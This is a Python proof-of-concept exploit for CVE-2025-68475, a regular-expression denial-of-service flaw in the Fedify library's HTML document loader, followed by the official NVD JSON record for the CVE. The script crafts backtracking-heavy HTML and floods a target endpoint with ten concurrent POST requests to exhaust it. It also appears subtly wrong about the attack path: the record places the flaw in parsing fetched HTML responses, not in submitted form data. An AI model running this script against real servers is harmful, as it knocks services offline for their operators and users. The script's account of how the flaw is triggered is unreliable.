CVE-2025-68475

#!/usr/bin/env python3 """ CVE-2025-68475 PoC - Fedify ReDoS Vulnerability This PoC demonstrates the Regular Expression Denial of Service in Fedify's document loader. """ import requests import time import threading TARGET_URL = "http://target-server/fedify-endpoint" def create_malicious_html(): """ Generate malicious HTML that triggers catastrophic backtracking in Fedify's HTML parsing regex with nested quantifiers. """ # Pattern designed to trigger ReDoS with nested quantifiers # Similar to the vulnerable regex pattern in docloader.ts:259 malicious_pattern = '<div[^>]*>.*?' * 20 + '<' + 'a' * 50 + '>' html_payload = f""" <!DOCTYPE html> <html> <head><title>Malicious Page</title></head> <body> {malicious_pattern} <a href="http://legitimate-site.com">Normal Link</a> </body> </html> """ return html_payload def send_request(delay=60): """ Send a request with malicious HTML content to trigger ReDoS. """ payload = create_malicious_html() try: print(f"[+] Sending malicious request to {TARGET_URL}") start_time = time.time() # Simulating the request that Fedify processes response = requests.post( TARGET_URL, data={'html_content': payload}, timeout=delay, headers={'Content-Type': 'application/x-www-form-urlencoded'} ) elapsed = time.time() - start_time print(f"[-] Request completed in {elapsed:.2f} seconds") except requests.Timeout: print("[!] Request timed out - ReDoS triggered successfully!") except Exception as e: print(f"[!] Error: {e}") def main(): print("=" * 60) print("CVE-2025-68475 - Fedify ReDoS PoC") print("=" * 60) print(f"\nTarget: {TARGET_URL}") print("\nStarting attack simulation...") # Launch multiple concurrent requests to exhaust resources threads = [] for i in range(10): t = threading.Thread(target=send_request, args=(60,)) threads.append(t) t.start() time.sleep(0.1) print("\n[*] All requests sent. Monitoring for DoS condition...") for t in threads: t.join() print("\n[+] Attack simulation complete") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-68475", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:09.143", "lastModified": "2026-03-17T19:39:32.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1333"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.13", "matchCriteriaId": "8F097114-F157-4FE4-9CB8-2BAA384C5B30"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.0", "versionEndExcluding": "1.7.14", "matchCriteriaId": "A9267FB8-A2C3-4269-A895-703ACA0C7078"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.8.1", "versionEndExcluding": "1.8.15", "matchCriteriaId": "D9EE0DA7-B892-4C34-B4F6-9B413A1A896F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fedify:fedify:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.9.0", "versionEndExcluding": "1.9.2", "matchCriteriaId": "CEFCAFFE-AFCB-468E-8F32-63B8205A39DA"}]}]}], "references": [{"url": "https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/fedify-dev/fedify/releases/tag/1.6.13", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/fedify-dev/fedify/releases/tag/1.7.14", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/fedify-dev/fedify/releases/tag/1.8.15", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}